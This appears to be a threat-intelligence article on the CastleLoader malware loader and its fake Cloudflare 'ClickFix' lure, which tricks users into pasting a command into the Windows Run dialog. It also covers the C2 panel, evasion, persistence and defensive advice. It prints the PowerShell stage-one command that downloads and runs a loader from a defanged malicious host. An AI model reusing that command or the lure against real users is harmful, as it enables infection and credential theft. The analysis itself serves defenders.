In 2025, cybersecurity researchers identified a rapidly evolving malware loader named CastleLoader, which has been actively used to infiltrate Windows computers. This malware employs sophisticated social engineering tactics, notably the Cloudflare-themed ClickFix technique, to deceive users into executing malicious commands.
Understanding CastleLoader
CastleLoader is a modular malware loader designed to deliver various secondary payloads, including information stealers like StealC and RedLine, as well as remote access trojans (RATs) such as NetSupport RAT and SectopRAT. Its adaptability allows attackers to tailor the payloads based on the victim’s profile, enhancing the effectiveness of their campaigns.
The ClickFix Technique
The ClickFix method is a social engineering strategy that manipulates users into executing harmful commands under the guise of resolving fictitious issues. In the context of CastleLoader, this involves presenting users with counterfeit Cloudflare verification pages that mimic legitimate security checks.
Attack Mechanism
1. Initial Engagement: Users encounter a fake Cloudflare verification page while visiting compromised websites or through malicious advertisements.
2. Social Engineering: The deceptive page instructs users to perform specific actions:
– Press `Windows + R` to open the Run dialog.
– Press `Ctrl + V` to paste a command that has been silently copied to the clipboard.
– Press `Enter` to execute the command.
3. Execution: The pasted command initiates a PowerShell script that downloads and executes the CastleLoader malware, leading to the installation of additional malicious payloads.
Scope of the Threat
Between May and July 2025, researchers recorded 1,634 malware download attempts attributed to CastleLoader, resulting in 469 confirmed infections—a success rate of approximately 28.7%. Notably, several campaigns targeted government networks in the United States, indicating a significant and widespread threat.
Command-and-Control Infrastructure
CastleLoader’s operations are coordinated through at least seven distinct command-and-control (C2) servers. The malware’s web-based C2 panel resembles a malware-as-a-service dashboard, offering features such as:
– Statistics: Monitoring infection rates and campaign effectiveness.
– Geographic Filters: Targeting victims based on location.
– One-Click Redeployment: Reinfecting already compromised systems with new payloads.
Operators can upload new binaries to a Delivery module and craft tasks that embed PowerShell commands into URL parameters, allowing for rapid campaign adjustments without modifying host sites.
Technical Details of the Infection Process
The hallmark of CastleLoader is its clipboard-poisoning ClickFix routine. When a victim loads the fake Cloudflare verification page, embedded JavaScript silently retrieves a Base64-encoded PowerShell payload and copies it to the clipboard. Users, following on-screen instructions, paste the code into the Windows Run dialog, triggering the next stage:
“`powershell
[System.Guid]$GDSGFBKSD = [System.Guid]::NewGuid().ToString();
$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;
Invoke-WebRequest ‘https://teamsap[.]org/s.php?an=2’ -OutFile $env:MYAPPDATA\$GDSGFBKSD.zip;
Expand-Archive $env:MYAPPDATA\$GDSGFBKSD.zip -DestinationPath $env:MYAPPDATA;
& $env:MYAPPDATA\loader.au3;
“`
This script downloads a campaign-specific ZIP file, unpacks an AutoIT loader, and executes shellcode that resolves hashed API names before contacting the C2 server over HTTPS to fetch the final payload.
Evasion Techniques
CastleLoader employs several methods to evade detection:
– Legitimate-Looking Domains: Staging downloads through domains that appear trustworthy.
– Use of Legitimate Tools: Utilizing tools like AutoIT to execute malicious code.
– Minimal Disk Artifacts: Executing payloads in memory to avoid leaving traces on the disk.
Persistence Mechanisms
The C2 server can instruct compromised hosts to:
– Create Scheduled Tasks: Ensuring malware execution at specified intervals.
– Inject DLLs into Trusted Processes: Maintaining a foothold within legitimate applications.
– Rerun Payloads on User Logon: Reinfecting the system each time the user logs in.
Detection and Mitigation Strategies
Given the dynamic nature of CastleLoader’s infection process, traditional static indicators are insufficient for detection. Behavioral detection methods that flag clipboard manipulation followed by outbound PowerShell traffic offer the best chance of early disruption.
Recommendations for Users
– Exercise Caution: Be wary of unexpected verification prompts, especially those instructing the execution of commands.
– Avoid Pasting Unknown Commands: Never paste and execute commands from untrusted sources into the Windows Run dialog or command prompt.
– Keep Software Updated: Regularly update operating systems and security software to protect against known vulnerabilities.
– Educate Users: Raise awareness about social engineering tactics like ClickFix to prevent inadvertent execution of malicious commands.
Conclusion
CastleLoader represents a significant advancement in malware delivery techniques, combining sophisticated social engineering with technical evasion strategies. Its use of the ClickFix method underscores the importance of user vigilance and robust behavioral detection mechanisms in mitigating such threats.
